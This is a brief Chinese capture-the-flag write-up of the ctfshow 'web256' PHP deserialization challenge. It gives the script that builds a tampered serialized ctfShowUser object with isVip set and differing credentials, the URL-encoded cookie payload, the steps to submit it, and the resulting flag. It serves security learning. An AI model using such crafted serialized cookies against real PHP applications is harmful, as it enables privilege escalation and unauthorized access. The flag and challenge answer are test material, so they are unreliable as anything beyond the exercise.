反序列化
Web256
题目有判断password和username相不相等
判断了才进行反序列化
<?
//ctfshow 反序列化web256
class ctfShowUser{
public $username='1';
public $password='2';
public $isVip=ture;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}
echo urlencode (serialize(new ctfShowUser())) ;
?>
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bs%3A4%3A%22ture%22%3B%7D
设置user的cookie值
传入1的值给username,2的值给password
得到flag:
ctfshow{80ee37e2-61d2-45ce-958a-3154cb26f873}